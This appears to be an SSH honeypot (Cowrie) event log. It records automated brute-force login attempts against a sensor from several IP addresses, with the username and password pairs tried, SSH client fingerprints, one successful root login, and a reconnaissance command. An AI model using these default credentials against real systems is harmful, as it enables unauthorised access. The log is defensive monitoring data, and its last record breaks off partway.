{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:10:00.600603Z","src_ip":"212.227.235.229","session":"56d9ae0b5e7b"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:01.817837Z","src_ip":"212.227.235.229","session":"56d9ae0b5e7b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15386,"dst_ip":"1.2.3.4","dst_port":22,"session":"a2c95dac0908","protocol":"ssh","message":"New connection: 212.227.235.229:15386 (1.2.3.4:22) [session: a2c95dac0908]","sensor":"my-vps","timestamp":"2025-08-26T12:10:02.068197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:02.481428Z","src_ip":"212.227.235.229","session":"a2c95dac0908"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:10:02.482610Z","src_ip":"212.227.235.229","session":"a2c95dac0908"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:03.734612Z","src_ip":"212.227.235.229","session":"a2c95dac0908"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":15398,"dst_ip":"1.2.3.4","dst_port":22,"session":"021a31b27386","protocol":"ssh","message":"New connection: 212.227.235.229:15398 (1.2.3.4:22) [session: 021a31b27386]","sensor":"my-vps","timestamp":"2025-08-26T12:10:03.981108Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:04.364315Z","src_ip":"212.227.235.229","session":"021a31b27386"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-26T12:10:04.366314Z","src_ip":"212.227.235.229","session":"021a31b27386"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":55312,"dst_ip":"1.2.3.4","dst_port":22,"session":"212da66c53ec","protocol":"ssh","message":"New connection: 212.227.235.229:55312 (1.2.3.4:22) [session: 212da66c53ec]","sensor":"my-vps","timestamp":"2025-08-26T12:10:05.099759Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:05.359468Z","src_ip":"212.227.235.229","session":"212da66c53ec"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:10:05.360193Z","src_ip":"212.227.235.229","session":"212da66c53ec"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:05.519107Z","src_ip":"212.227.235.229","session":"021a31b27386"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38220,"dst_ip":"1.2.3.4","dst_port":22,"session":"cf3d2588b495","protocol":"ssh","message":"New connection: 196.251.86.249:38220 (1.2.3.4:22) [session: cf3d2588b495]","sensor":"my-vps","timestamp":"2025-08-26T12:10:05.682391Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:06.257573Z","src_ip":"196.251.86.249","session":"cf3d2588b495"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:10:06.258735Z","src_ip":"196.251.86.249","session":"cf3d2588b495"}
{"eventid":"cowrie.login.failed","username":"admin","password":"P@ssw0rd","message":"login attempt [admin/P@ssw0rd] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:07.252717Z","src_ip":"212.227.235.229","session":"212da66c53ec"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:08.572569Z","src_ip":"212.227.235.229","session":"212da66c53ec"}
{"eventid":"cowrie.login.failed","username":"git","password":"321123","message":"login attempt [git/321123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:08.684246Z","src_ip":"196.251.86.249","session":"cf3d2588b495"}
{"eventid":"cowrie.session.closed","duration":"4.6","message":"Connection lost after 4.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:10.276320Z","src_ip":"196.251.86.249","session":"cf3d2588b495"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53884,"dst_ip":"1.2.3.4","dst_port":22,"session":"a8d6e465039e","protocol":"ssh","message":"New connection: 83.168.105.65:53884 (1.2.3.4:22) [session: a8d6e465039e]","sensor":"my-vps","timestamp":"2025-08-26T12:10:12.746898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:12.747821Z","src_ip":"83.168.105.65","session":"a8d6e465039e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:10:12.783210Z","src_ip":"83.168.105.65","session":"a8d6e465039e"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:12.904590Z","src_ip":"83.168.105.65","session":"a8d6e465039e"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:13.942080Z","src_ip":"83.168.105.65","session":"a8d6e465039e"}
{"eventid":"cowrie.session.closed","duration":"70.0","message":"Connection lost after 70.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:22.563744Z","src_ip":"212.227.235.229","session":"7a6a22612bbf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":53812,"dst_ip":"1.2.3.4","dst_port":22,"session":"387b40063a7a","protocol":"ssh","message":"New connection: 83.168.105.65:53812 (1.2.3.4:22) [session: 387b40063a7a]","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.428246Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.429044Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.515419Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.624769Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T12:10:28.717581Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.718405Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.755674Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:28.756893Z","src_ip":"83.168.105.65","session":"387b40063a7a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44244,"dst_ip":"1.2.3.4","dst_port":22,"session":"890639562baf","protocol":"ssh","message":"New connection: 212.227.235.229:44244 (1.2.3.4:22) [session: 890639562baf]","sensor":"my-vps","timestamp":"2025-08-26T12:10:39.289307Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:39.704119Z","src_ip":"212.227.235.229","session":"890639562baf"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-26T12:10:39.704845Z","src_ip":"212.227.235.229","session":"890639562baf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"Admin123","message":"login attempt [admin/Admin123] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:41.624990Z","src_ip":"212.227.235.229","session":"890639562baf"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:42.997883Z","src_ip":"212.227.235.229","session":"890639562baf"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":60538,"dst_ip":"1.2.3.4","dst_port":22,"session":"97e961ed4703","protocol":"ssh","message":"New connection: 83.168.105.65:60538 (1.2.3.4:22) [session: 97e961ed4703]","sensor":"my-vps","timestamp":"2025-08-26T12:10:43.961080Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:43.961774Z","src_ip":"83.168.105.65","session":"97e961ed4703"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:10:43.998175Z","src_ip":"83.168.105.65","session":"97e961ed4703"}
{"eventid":"cowrie.login.failed","username":"deploy","password":"deploy","message":"login attempt [deploy/deploy] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:44.108315Z","src_ip":"83.168.105.65","session":"97e961ed4703"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:10:45.149313Z","src_ip":"83.168.105.65","session":"97e961ed4703"}
{"eventid":"cowrie.session.connect","src_ip":"83.168.105.65","src_port":54294,"dst_ip":"1.2.3.4","dst_port":22,"session":"7a591e2d1928","protocol":"ssh","message":"New connection: 83.168.105.65:54294 (1.2.3.4:22) [session: 7a591e2d1928]","sensor":"my-vps","timestamp":"2025-08-26T12:10:59.396710Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:10:59.397669Z","src_ip":"83.168.105.65","session":"7a591e2d1928"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T12:10:59.433822Z","src_ip":"83.168.105.65","session":"7a591e2d1928"}
{"eventid":"cowrie.login.failed","username":"demo","password":"demo","message":"login attempt [demo/demo] failed","sensor":"my-vps","timestamp":"2025-08-26T12:10:59.544433Z","src_ip":"83.168.105.65","session":"7a591e2d1928"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T12:11:00.582816Z","src_ip":"83.168.105.65","session":"7a591e2d1928"}
{"eventid":"cowrie.session.connect","src_ip":"196.251.86.249","src_port":38080,"dst_ip":"1.2.3.4","dst_port":22,"session":"c8ba5da2adf4","protocol":"ssh","message":"New connection: 196.251.86.249:38080 (1.2.3.4:22) [session: c8ba5da2adf4]","sensor":"my-vps","timestamp":"2025-08-26T12:11:05.357260Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T12:11:05.863956Z","src_ip":"196.251.86.249","session":"c8ba5da2adf4"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2